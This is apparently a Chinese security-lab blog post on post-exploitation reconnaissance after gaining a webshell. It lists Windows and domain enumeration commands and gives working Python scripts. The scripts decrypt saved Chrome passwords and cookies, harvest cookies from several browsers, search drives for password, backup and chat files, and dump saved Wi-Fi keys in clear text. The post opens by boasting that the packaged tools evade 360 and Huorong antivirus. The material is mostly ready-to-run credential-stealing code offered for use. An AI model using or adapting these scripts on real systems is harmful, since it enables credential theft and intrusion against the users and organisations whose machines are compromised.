——D&X安全实验室
文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo
可打包为可执行文件,可过360、火绒等
渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。
当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:
当前用户:
whoami /all
网络信息:
ipconfig /all
计算机版本/补丁编号:
systeminfo
进程列表:
tasklist
补丁信息:
wmic qfe
系统信息:
wmic os
机器运行信息:
net statistics workstation
系统架构:
set process
防火墙配置:
netsh firewall show config
日志修改权限:
wmic nteventlog get path,filename,writeable
当前在线用户:
quser
本地用户:
net user
本机管理员:
net localgroup administrators
已安装软件信息:
wmic product get name,version
杀软信息:
WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
端口信息:
netstat -ano
路由信息:
route print
arp信息:
arp -a
host信息:
type c:\Windows\system32\drivers\etc\hosts
wifi密码:
netsh wlan show profile
计划任务:
schtasks
自启服务:
wmic startup get command, caption
已启服务:
net start
本机服务:
wmic service list brief
DNS服务器:
nslookup
DNS缓存:
ipconfig /displaydns
当前域信息:
net config workstation
当前连接:
net use
当前映射:
net share
域环境:
net view
定位域控:
net group "domain controllers" /domain
域用户:
net user /domain
域用户详情:
wmic useraccount get /all
域用户密码策略:
net accounts /domain
本地用户组信息:
net localgroup
域用户组信息:
net group /domain
域用户组成员:
net "Domain users" /domain
域管理员用户组成员:
net group "Enterprise Admins" /domain
域信任信息:
nltest /domain_trusts
以下脚本可用于辅助获取:
import os,sys
import csv
cmdList={
#主机类
"当前用户":"whoami /all",
"网络信息":"ipconfig /all",
"计算机版本/补丁编号":"systeminfo",
"进程列表":"tasklist",
"补丁信息":"wmic qfe",
"系统信息":"wmic os",
"机器运行信息":"net statistics workstation",
"系统架构":"set process",
"防火墙配置":"netsh firewall show config",
"日志修改权限":"wmic nteventlog get path,filename,writeable",
"当前在线用户":"quser",
"本地用户":"net user",
"本机管理员":"net localgroup administrators",
"已安装软件信息":"wmic product get name,version",
#杀软类
"杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe",
#网络类
"端口信息":"netstat -ano",
"路由信息":"route print",
"arp信息":"arp -a",
"host信息":"type c:\Windows\system32\drivers\etc\hosts",
"wifi密码":"netsh wlan show profile",
#计划任务类
"计划任务":"schtasks",
#服务类
"自启服务":"wmic startup get command, caption",
"已启服务":"net start",
"本机服务":"wmic service list brief",
#DNS服务
"DNS服务器":"nslookup",
"DNS缓存":"ipconfig /displaydns",
"DNS服务器":"nslookup",
#域信息
"当前域信息":"net config workstation",
"当前连接":"net use",
"当前映射":"net share",
"域环境":"net view",
"定位域控":"net time",
"定位域控":"net group \"domain controllers\" /domain",
"域用户":"net user /domain",
"域用户详情":"wmic useraccount get /all ",
"域用户密码策略":"net accounts /domain",
"本地用户组信息":"net localgroup",
"域用户组信息":"net group /domain",
"域用户组成员":"net \"Domain users\" /domain",
"域管理员用户组成员":"net group \"Domain Admins\" /domain",
"域管理员用户组成员":"net group \"Enterprise Admins\" /domain",
"域信任信息":"nltest /domain_trusts",
}
choseList={}
def main():
#可添加选择性执行,对应数据丢入choseList再执行
#以下默认全部执行
id=0
for key,value in cmdList.items():
id=id+1
print('\n\n-------------%s-------------'%key)
message = os.popen(value).read()
print(message)
csv_writer.writerow([ id, key, message])
if __name__ == "__main__":
filename='./Result/hostInfo.csv'
with open(filename, 'w', encoding='utf-8', newline='') as q:
csv_writer = csv.writer(q)
csv_writer.writerow([ 'ID','类型', '信息'])
main()
在我们内网渗透过程中没有头绪时,我们往往能通过一些出其不意的方式来获取一些渗透路径。
通过获取浏览器书签、记录等信息来获取更多未知可渗透网络,通过获取浏览器Cookie以及存储的账号密码来获取Web端权限。以下脚本可用于辅助获取:
import os,sys
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime, timedelta
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import browser_cookie3
import requests
import csv
#初始化地址
if 'win' in sys.platform:
BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Bookmarks') # 存在保存的书签
localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# 存在AES加密密钥
loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# 存在保存的页面账号密码
cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# 存在cookie
elif 'linux' in sys.platform:
BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks')
localStatePath = os.path.expanduser('~/.config/google-chrome/Local State')
loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data')
cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies')
else:#Mac
BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks')
localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State')
loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data')
cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies')
def getChromeTime(chromedate): # 转换时间
try:
return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate))
except:
return ''
def getEncKey(): # 获取加密AESkey
with open(localStatePath, "r", encoding="utf-8") as f:
localStateTest = f.read()
localState = json.loads(localStateTest)
key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
#Chrome专属,可删除使用公用方法
def getDecCookie(encCookie): # 获取解密后的Cookie
if sys.platform == 'win32':
try:
if encCookie[:4] == b'x01x00x00x00':
decCookie = dpapiDecrypt(encCookie)
return decCookie.decode()
elif encCookie[:3] == b'v10':
decCookie = aesDecrypt(encCookie)
return decCookie[:-16].decode()
except WindowsError:
return None
else:
raise WindowsError
#Chrome专属,可删除使用公用方法
def dpapiDecrypt(encCookie): # 使用DPAPI解密
import ctypes
import ctypes.wintypes
class DATA_BLOB(ctypes.Structure):
_fields_ = [('cbData', ctypes.wintypes.DWORD),
('pbData', ctypes.POINTER(ctypes.c_char))]
p = ctypes.create_string_buffer(encCookie, len(encCookie))
blobin = DATA_BLOB(ctypes.sizeof(p), p)
blobout = DATA_BLOB()
retval = ctypes.windll.crypt32.CryptUnprotectData(
ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
if not retval:
raise ctypes.WinError()
result = ctypes.string_at(blobout.pbData, blobout.cbData)
ctypes.windll.kernel32.LocalFree(blobout.pbData)
return result
#Chrome专属,可删除使用公用方法
def aesDecrypt(encCookie): # 使用AESkay解密
key = getEncKey()
nonce = encCookie[3:15]
cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
cipher.mode = modes.GCM(nonce)
decryptor = cipher.decryptor()
return decryptor.update(encCookie[15:])
def decPassword(password, key): # 解密密码
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
def getPassword(): # 获取密码
csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间'])
key = getEncKey()
filename = "chromeLoginData.db"
# 创建新chrome数据库文件,防止正在运行导致数据库锁定
shutil.copyfile(loginDataPath, filename)
db = sqlite3.connect(filename)
db.text_factory = str
cursor = db.cursor()
cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created")
id=0
for row in cursor.fetchall():
url = row[0]
username = row[1]
password = decPassword(row[2], key)
dateLastUsed = row[3]
if username or password:
id=id+1
print("\nURL: "+url)
print("Username: "+username)
print("Password: "+password)
print("Last Used: "+getChromeTime(dateLastUsed))
csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)])
else:
continue
cursor.close()
db.close()
csv_writer.writerow(' ')
try:
os.remove(filename)
except:
pass
def formatCookiejar(cookiejar): # 格式化cookiejar对象并打印
cookieList = str(cookiejar)[12:-3].split(">, <")
newCookieList=[]
id=0
for i in range(len(cookieList)):
id=id+1
host=cookieList[i].split(" for ")[1]
name=cookieList[i].split("Cookie ")[1].split("=")[0]
cookie=cookieList[i].split("=")[1].split(" for ")[0]
print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie))
csv_writer.writerow([ id, host, name, cookie])
def getCookie(): # 获取cookie
try:
chromeCookie = browser_cookie3.chrome()
print('\n\n-------------Chrome浏览器Cookie如下:-------------')
getChromeCookie()
except:
try:
csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie'])
formatCookiejar(chromeCookie)
csv_writer.writerow(' ')
except:
chromeCookie = []
csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' '])
csv_writer.writerow(' ')
print('\n未检测到Chrome浏览器')
try:
firefoxCookie = browser_cookie3.firefox()
csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie'])
print('\n\n-------------Firefox浏览器Cookie如下:-------------')
formatCookiejar(firefoxCookie)
csv_writer.writerow(' ')
except:
firefoxCookie = []
csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' '])
csv_writer.writerow(' ')
print('\n未检测到Firefox浏览器')
try:
operaCookie = browser_cookie3.opera()
csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie'])
print('\n\n-------------Opera浏览器Cookie如下:-------------')
formatCookiejar(operaCookie)
csv_writer.writerow(' ')
except:
operaCookie = []
csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' '])
csv_writer.writerow(' ')
print('\n未检测到Opera浏览器')
try:
edgeCookie = browser_cookie3.edge()
csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie'])
print('\n\n-------------Edge浏览器Cookie如下:-------------')
formatCookiejar(edgeCookie)
csv_writer.writerow(' ')
except:
edgeCookie = []
csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' '])
csv_writer.writerow(' ')
print('\n未检测到Edge浏览器')
try:
chromiumCookie = browser_cookie3.chromium()
csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie'])
print('\n\n-------------Chromium浏览器Cookie如下:-------------')
formatCookiejar(chromiumCookie)
csv_writer.writerow(' ')
except:
chromiumCookie = []
csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' '])
csv_writer.writerow(' ')
print('\n未检测到Chromium浏览器')
#Chrome专属,可删除使用公用方法
def getChromeCookie(): # 获取cookie
filename = "chromeCookieData.db"
shutil.copyfile(cookiesPath, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")#需新版sqlite3,否则会报错encrypted_value无法转utf-8
csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期'])
id=0
for row in cursor.fetchall():
try:
host = row[0]
path = row[1]
name = row[2]
encrypted_value = row[3]
expires_utc =getChromeTime(row[4])
if encrypted_value:
id=id+1
print("\nHost: "+host)
print("Path: "+path)
print("Name: "+name)
try:
cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # Chrome80.X版本前解密方式
except Exception as e:
cookie=getDecCookie(encrypted_value) # Chrome80.X版本后解密方式
print("Cookie: "+cookie)
print("Expires: "+expires_utc)
csv_writer.writerow([ id, host, path, name, cookie, expires_utc])
except:
continue
cursor.close()
db.close()
csv_writer.writerow(' ')
try:
os.remove(filename)
except:
pass
def forBookmarks(itemData,id): # 循环书签数据
for item in itemData:
type = item['type']
name = item['name']
if type == 'url':
id = id+1
print('\nTitle: ',name, '\nUrl: ',item['url'])
csv_writer.writerow([ id,name,item['url']])
else: # 文件夹
forBookmarks(item['children'],id)
def getBookmarks(): # 获取书签
csv_writer.writerow([ 'ID','【Chrome】书签名', 'url地址'])
with open(BookmarksPath, 'r',encoding = "utf-8") as f:
itemData=json.loads(f.read())['roots']['bookmark_bar']['children']
id=0
forBookmarks(itemData,id)
csv_writer.writerow(' ')
def main():
print('\n-------------Chrome浏览器书签如下:-------------')
getBookmarks()
print('\n\n-------------Chrome浏览器密码如下:-------------')
getPassword()
print('\n\n-------------各浏览器Cookie如下:-------------')
getCookie()
if __name__ == "__main__":
filename='./Result/bowserInfo.csv'
with open(filename, 'w', encoding='utf-8', newline='') as q:
csv_writer = csv.writer(q)
main()
通过遍历获取敏感文件,或者聊天文件,有可能存在Web控制台账号密码等敏感信息。以下脚本可用来辅助获取:
import os,sys
import csv
cmdList={
"QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."',
"微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."',
"下载文件":'dir /a /s /b "C:/Users/Administrator/Downloads"',
"office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"',
"sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"',
"虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"',
"outlook电子邮件文件":'c: & dir /a /s /b "*.eml"',
"outlook数据库文件":'c: & dir /a /s /b "*.pst"',
"配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"',
"备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"',
"密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"',
"密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"',
#"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"',
#"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"',
}
choseList={}
def main():
#可添加选择性执行,对应数据丢入choseList再执行
#以下默认全部执行
#第一次运行比较慢,正常
id=0
for key,value in cmdList.items():
id = id + 1
print('\n\n-------------%s-------------'%key)
message = os.popen(value).read()
print(message)
csv_writer.writerow([ id, key, message])
#可以添加选择性读取某文件---我有。懒
if __name__ == "__main__":
filename='./Result/sensitiveFile.csv'
with open(filename, 'w', encoding='utf-8', newline='') as q:
csv_writer = csv.writer(q)
csv_writer.writerow([ 'ID','类型', '路径'])
main()
通过获取Wifi账号密码,获得的足够多的密码样本来分析密码设置方式和使用习惯,从而进行针对性的攻击利用。以下脚本可用来辅助获取:
import os
import importlib,sys
import csv
importlib.reload(sys)
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
list = []
# 获取所有的wifi名称
message = os.popen('netsh wlan show profiles').readlines()
print('正在解析中,请稍等……')
for i in message:
result = i.strip().encode().decode("utf-8")
if result.find(u"所有用户配置文件 : ") != -1:
command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
try:
per_wifi = os.popen(command).readlines()
except:
per_wifi = []
for j in per_wifi:
passwd = j.strip().encode().decode("utf-8")
if passwd.find(u"关键内容 :") != -1:# 密码字符串不为空时
if passwd[18:] != '':
list_temp = []
list_temp.append(result[11:])
list_temp.append(passwd[18:])
list.append(list_temp)
return list
if __name__ == "__main__":
list = checkWIFI()
print("返回结果如下:")
filename='./Result/conWifiInfo.csv'
with open(filename, 'w', encoding='utf-8', newline='') as q:
csv_writer = csv.writer(q)
csv_writer.writerow([ 'ID','wifi名称', '密码'])
i = 0
for j in list:
i = i + 1
print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
csv_writer.writerow([ i, j[0], j[1]])